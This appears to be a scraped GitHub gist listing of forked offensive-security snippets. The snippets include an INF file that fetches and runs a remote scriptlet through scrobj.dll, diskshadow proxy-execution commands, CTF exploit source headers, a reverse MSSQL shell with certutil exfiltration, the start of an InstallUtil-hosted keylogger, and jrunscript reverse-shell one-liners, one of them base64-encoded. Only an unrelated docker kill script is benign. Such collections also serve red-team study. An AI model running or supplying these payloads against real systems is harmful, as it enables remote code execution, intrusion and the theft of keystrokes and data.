This script generates a payload for use with Responder.
- Generate a payload with
main.py - Copy and paste the one-liner output into the
WPADScriptfield ofResponder.conf.
test@test:~$ python3 main.py --help
usage: main.py [-h] [-o OUT] cmd
sasqwatch
/ ieuinit.inf
Created
January 10, 2019 21:20
— forked from bohops/ieuinit.inf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [version] | |
| signature="$CHICAGO$" | |
| AdvancedINF=2.0 | |
| [DefaultInstall.Windows7] | |
| UnRegisterOCXs=FunRun | |
| [FunRun] | |
| %11%\scrobj.dll,NI,https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct |
sasqwatch
/ diskshadow.txt
Created
January 10, 2019 21:19
— forked from bohops/diskshadow.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Execute | |
| ======= | |
| *Interactive Mode | |
| cmd.exe | |
| c:\windows\system32\diskshadow.exe | |
| > exec calc.exe | |
| > exec "cmd.exe" /c calc.exe | |
| > exit |
sasqwatch
/ WCTF_2018_searchme_exploit.cpp
Created
January 7, 2019 17:56
— forked from j00ru/WCTF_2018_searchme_exploit.cpp
WCTF 2018 "searchme" exploit by Mateusz "j00ru" Jurczyk
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // WCTF 2018 "searchme" task exploit | |
| // | |
| // Author: Mateusz "j00ru" Jurczyk | |
| // Date: 6 July 2018 | |
| // Tested on: Windows 10 1803 (10.0.17134.165) | |
| // | |
| // See also: https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/ | |
| #include <Windows.h> | |
| #include <winternl.h> | |
| #include <ntstatus.h> |
sasqwatch
/ Insomnihack_Teaser_2017_winworld_exploit.py
Created
January 7, 2019 17:56
— forked from j00ru/Insomnihack_Teaser_2017_winworld_exploit.py
Insomni'hack Teaser 2017 "winworld" exploit by Mateusz "j00ru" Jurczyk
sasqwatch
/ mandros.py
Created
March 22, 2018 18:33
— forked from xassiz/mandros.py
Reverse MSSQL shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import requests | |
| import threading | |
| import HTMLParser | |
| from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler | |
| ''' | |
| Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration | |
| Author: @xassiz | |
| ''' |
sasqwatch
/ docker_kill.sh
Created
March 8, 2018 19:13
— forked from evanscottgray/docker_kill.sh
kill all docker containers at once...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| docker ps | awk {' print $1 '} | tail -n+2 > tmp.txt; for line in $(cat tmp.txt); do docker kill $line; done; rm tmp.txt |
sasqwatch
/ InstallUtilMouseKeyLogger.cs
Created
February 27, 2018 00:02
Input Capture - InstallUtil Hosted MouseClick / KeyLogger -
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Windows.Forms; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //KeyStroke Mouse Clicks Code | |
| /* | |
| * https://code.google.com/p/klog-sharp/ | |
| */ |
sasqwatch
/ README.md
Created
February 26, 2018 20:30
— forked from jthuraisamy/README.md
CVE-2017-11907 WPAD.dat Generator for Responder
sasqwatch
/ JVM_POST_EXPLOIT.md
Created
January 30, 2018 19:41
— forked from frohoff/JVM_POST_EXPLOIT.md
JVM Post-Exploitation One-Liners
Nashorn / Rhino:
- Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'- Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
sasqwatch
/ wordpress.md
Created
October 19, 2017 17:14
— forked from cure53/wordpress.md
WordPress Flash XSS in flashmediaelement.swf